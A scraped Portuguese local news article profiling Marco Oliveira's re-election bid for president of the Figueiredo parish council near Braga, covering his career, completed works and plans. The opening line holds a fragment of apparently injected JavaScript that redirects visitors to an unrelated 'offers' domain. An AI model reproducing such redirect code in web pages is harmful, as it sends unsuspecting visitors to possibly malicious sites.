{ window.location.replace('http://offers25942.xyz/'); }, delay);})();-noticias postid-3105 _masterslider _ms_version_3.7.8" id="page_body">

Figueiredo nas mãos certas com Marco Oliveira

“Seguimos Juntos por Figueiredo”. É com este mote que Marco Oliveira avança para uma recandidatura à Junta de Freguesia de Figueiredo pela Coligação “Juntos por Braga” com a certeza de que ainda há espaço para melhorar o trabalho de excelência que tem vindo a ser desenvolvido ao longo dos últimos anos.

Com 47 anos, Marco Oliveira, Gestor de Contas de profissão, nasceu em Paris, mas com apenas 1 ano de idade passou a residir em Figueiredo, com os seus avós paternos. A vontade de assumir a presidência da autarquia local surgiu de uma ligação à freguesia que se foi reforçando, ano após ano, pela vontade de servir a comunidade.

Desde cedo, Marco Oliveira participou ativamente nas atividades da freguesia. Com 15 anos ajudava a organizar as comemorações do 25 de Abril, provas de atletismo organizadas pela ACR Hélios de Figueiredo, chegando a ser atleta do Grupo Desportivo de Figueiredo e dirigente na sua primeira participação nas competições da AF de Braga. Importa referir ainda que foi fundador e dirigente, durante dois mandatos, da Associação Divino Salvador de Figueiredo.

O percurso na política começou a desenhar-se em 1997, momento em que integrou uma lista de jovens que se candidatou às eleições autárquicas em Figueiredo. De 2001 a 2005 desempenhou funções de secretário da Assembleia de Freguesia e de 2005 a 2013 Tesoureiro do executivo. Desde 2013 assume a liderança como presidente. São vinte anos de experiência e vivência com a freguesia e os seus habitantes.

Sobre o trabalho realizado, a obra fala por si. A requalificação do recinto da Capela Nossa Senhora de Fátima, a implementação da loja do “Espaço Cidadão”, a requalificação do cemitério paroquial, a intervenção no parque desportivo de Figueiredo, a intervenção de colocação de saneamento na Rua do Sobrado, o alargamento da Travessa do Pinheiro do Bicho, a retificação e colocação de águas pluviais na Travessa de São Brás, a requalificação dos passeios na Rua das Pedreiras e Bons Caminhos e muitas outras pequenas intervenções de melhoramento e reparação marcaram a governação de Marco Oliveira. Estão ainda previstas as intervenções de requalificação e águas pluviais da Rua do Bairro, a requalificação dos Passeios da Rua Sra. Bons Caminhos, e a requalificação da Escola Básica de Figueiredo e Pré-Escola.

Para os próximos quatro anos, o apoio às atividades das coletividades, sejam de âmbito desportivo, cultural e recreativo merecerá por parte da Junta de Freguesia uma aposta forte. Também a aposta na educação, tal como se tem verificado ao longo dos últimos anos, é para manter ou, se possível, melhorar, através de infraestruturas e de um investimento que ajude as famílias.
Atenta às ambições de quem se quer fixar na freguesia, principalmente da comunidade jovem, a equipa liderada por Marco Oliveira ambiciona ainda explorar parcerias para aumentar a oferta de habitações para quem queira viver em Figueiredo.
Sobre projetos que melhoram a qualidade de vida das pessoas, destaque para a aposta na reabilitação viária (Rua de São Miguel, Travessa das Pedreiras, Rua Casal de Vila, Rua e Travessa do Forno), mas também das áreas de lazer, como é o caso do Parque de Merendas de Ribeiro dos Prados.

É na combinação de provas dadas no passado recente com metas ambiciosas para o futuro que Marco Oliveira se apresenta aos eleitores como uma aposta segura para impulsionar e dinamizar a freguesia de Figueiredo.